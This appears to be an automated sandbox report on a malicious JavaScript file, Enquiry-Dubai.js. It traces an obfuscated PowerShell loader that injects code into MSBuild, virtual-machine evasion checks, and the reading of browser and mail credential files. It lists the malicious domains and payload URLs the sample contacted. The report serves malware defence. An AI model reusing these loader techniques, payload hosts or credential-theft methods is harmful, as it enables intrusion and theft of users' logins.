                        Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:401922 o:Windows%20Script%20Host f:CreateObject r:");IWshShell3._00000000();ITextStream.WriteLine(" entry:403390 o: f:Run a0:%22powershell%20-NoProfile%20-Command%20%22%22%24Codigo%20%3D%20'JslanshacksBtslanshacksG8slanshacksdslanshacksBvslanshacksHIslanshacksYgBpslanshacksGsslanshacksZQBkslanshacksCslanshacksslanshacksPQs");IWshShell3.Run("powershell -NoProfile -Command ""$Codigo = 'JslanshacksBtslanshacksG8slans", "0", "false")
                        Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command
                        Source: Enquiry-Dubai.js String : entropy: 5.3, length: 203, content: "[Con\x2660\x2d5b\x1c08\x2a3c\xd83d\xdcd4\x02d2\x2af9\x1f2a\x1b7e\x0f5d\x16f9\x143f\xd83e\xddb0\x2e1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFC3C746506 push E95CB3CEh; ret 7_2_00007FFC3C746529
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFC3C74652A push E95CB3CEh; ret 7_2_00007FFC3C746529
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFC3C7429FD push ebx; iretd 7_2_00007FFC3C742A4A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFC3C742AFA push eax; retf 7_2_00007FFC3C742B11
                        Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: Yara match File source: Process Memory Space: powershell.exe PID: 8188, type: MEMORYSTR
                        Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Source: powershell.exe, 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2473875067.0000000000402000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2D70000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2EE0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 4EE0000 memory reserve | memory write watch
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6173
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3684
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 6823
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 2998
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98578Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98468Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98357Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98243Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98140Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98031Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97921Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97812Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97702Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97593Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97374Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97265Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97156Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97045Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96937Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96823Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99876Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99751Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99626Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99501Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99376Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99251Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99126Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99001Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98876Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98751Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98626Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98501Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98376Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98251Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98126Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98001Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97876Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97751Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97626Jump to behavior
                        Source: MSBuild.exe, 0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !vmware virtual s scsi disk device
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware svga
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vboxservice
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: name!vmware virtual s scsi disk device
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware pointing device
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwarexDc
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware sata
                        Source: powershell.exe, 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1458640279.000001AE7CE80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: VirtualMachineDetector
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmsrvc
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01B97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMwarexDc
                        Source: powershell.exe, 00000007.00000002.1457560353.000001AE7CAF0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2498769086.0000000006201000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware vmci bus device
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware sata{0} ({1})
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareU{{ A = {0}, B = {1}, C = {2}, D = {3}, E = {4}, F = {5}, G = {6}, H = {7}, I = {8} }}
                        Source: MSBuild.exe, 0000000A.00000002.2473875067.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware usb pointing device
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware s
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01B97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmusrvc
                        Source: MSBuild.exe, 0000000A.00000002.2473875067.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmtools
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                        Source: powershell.exe, 00000007.00000002.1465010749.00007FFC3C984000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: virtualmachinedetector
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_02D770B0 CheckRemoteDebuggerPresent,10_2_02D770B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process queried: DebugPort
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        Source: Yara match File source: amsi64_8188.amsi.csv, type: OTHER
                        Source: Yara match File source: Process Memory Space: powershell.exe PID: 8188, type: MEMORYSTR
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43E000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 440000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: FD7008
                        Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command ""$Codigo = '[obfuscated encoded payload omitted]
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        Source: Yara match, File source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 7.2.powershell.exe.1ae117de740.7.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 7.2.powershell.exe.1ae117de740.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 7.2.powershell.exe.1ae113f6e18.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 0000000A.00000002.2473875067.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 0000000A.00000002.2482251027.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: Process Memory Space: powershell.exe PID: 8188, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: MSBuild.exe PID: 3028, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

                        Remote Access Functionality

                        Source: Yara match, File source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 7.2.powershell.exe.1ae117de740.7.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 7.2.powershell.exe.1ae117de740.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 7.2.powershell.exe.1ae113f6e18.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 0000000A.00000002.2473875067.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 0000000A.00000002.2482251027.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: Process Memory Space: powershell.exe PID: 8188, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: MSBuild.exe PID: 3028, type: MEMORYSTR
                        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                        Gather Victim Identity Information | 33 Scripting | Valid Accounts | 231 Windows Management Instrumentation | 33 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                        Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 211 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 34 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                        Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | Logon Script (Windows) | Logon Script (Windows) | 2 Obfuscated Files or Information | Security Account Manager | 531 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                        Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 1 Process Discovery | Distributed Component Object Model | 1 Input Capture | 1 Data Encoding | Traffic Duplication | Data Destruction
                        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 261 Virtualization/Sandbox Evasion | LSA Secrets | 261 Virtualization/Sandbox Evasion | SSH | Keylogging | 2 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 211 Process Injection | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | 13 Application Layer Protocol | Data Transfer Size Limits | Service Stop
                        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                        Behavior Graph ID: 1646313 Sample: Enquiry-Dubai.js Startdate: 23/03/2025 Architecture: WINDOWS Score: 100 (graph not reproduced; process chain: wscript.exe started powershell.exe, which started MSBuild.exe and conhost.exe)

                        Source | Detection | Scanner
                        Enquiry-Dubai.js | 6% | Virustotal
                        Enquiry-Dubai.js | 6% | ReversingLabs
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        Source | Detection | Scanner | Label
                        http://detarcoopmedical.com | 0% | Avira URL Cloud | safe
                        http://mail.detarcoopmedical.com | 0% | Avira URL Cloud | safe
                        https://pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.dev/223.txt | 0% | Avira URL Cloud | safe
                        http://pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.dev | 0% | Avira URL Cloud | safe
                        http://r11.o.lencr.org0# | 0% | Avira URL Cloud | safe
                        https://pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.dev | 0% | Avira URL Cloud | safe


                        Name | IP | Active | Malicious | Antivirus Detection | Reputation
                        bg.microsoft.map.fastly.net | 199.232.214.172 | true | false |  | high
                        detarcoopmedical.com | 161.97.124.96 | true | true |  | unknown
                        ia600204.us.archive.org | 207.241.227.224 | true | false |  | high
                        ip-api.com | 208.95.112.1 | true | false |  | high
                        pki-goog.l.google.com | 142.251.40.227 | true | false |  | high
                        pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.dev | 172.66.0.235 | true | true |  | unknown
                        c.pki.goog | unknown | unknown | false |  | high
                        mail.detarcoopmedical.com | unknown | unknown | true |  | unknown
                                        Name | Malicious | Antivirus Detection | Reputation
                                        https://pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.dev/223.txt | true | Avira URL Cloud: safe | unknown
                                        https://ia600204.us.archive.org/25/items/new_image_20250318/new_image.jpg | false |  | high
                                        http://ip-api.com/line/?fields=hosting | false |  | high
                                            Name | Source | Malicious | Antivirus Detection | Reputation
                                            http://nuget.org/NuGet.exe | powershell.exe, 00000007.00000002.1429331571.000001AE10075000.00000004.00000800.00020000.00000000.sdmp | false |  | high
                                            https://pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.dev | powershell.exe, 00000007.00000002.1411249717.000001AE01C98000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                                            https://account.dyn.com/ | powershell.exe, 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2473875067.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false |  | high
                                            http://pesterbdd.com/images/Pester.png | powershell.exe, 00000007.00000002.1411249717.000001AE0022C000.00000004.00000800.00020000.00000000.sdmp | false |  | high
                                            http://r11.o.lencr.org0# | MSBuild.exe, 0000000A.00000002.2498769086.0000000006257000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2476202501.0000000001130000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2479036886.00000000011FE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2498769086.0000000006201000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                                            http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000007.00000002.1411249717.000001AE0022C000.00000004.00000800.00020000.00000000.sdmp | false |  | high
                                            http://x1.c.lencr.org/0 | MSBuild.exe, 0000000A.00000002.2498769086.0000000006257000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2476202501.0000000001130000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2479036886.00000000011FE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2498769086.0000000006201000.00000004.00000020.00020000.00000000.sdmp | false |  | high
                                            http://x1.i.lencr.org/0 | MSBuild.exe, 0000000A.00000002.2498769086.0000000006257000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2476202501.0000000001130000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2479036886.00000000011FE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2498769086.0000000006201000.00000004.00000020.00020000.00000000.sdmp | false |  | high
                                            https://contoso.com/ | powershell.exe, 00000007.00000002.1429331571.000001AE10075000.00000004.00000800.00020000.00000000.sdmp | false |  | high
                                            https://nuget.org/nuget.exe | powershell.exe, 00000007.00000002.1429331571.000001AE10075000.00000004.00000800.00020000.00000000.sdmp | false |  | high
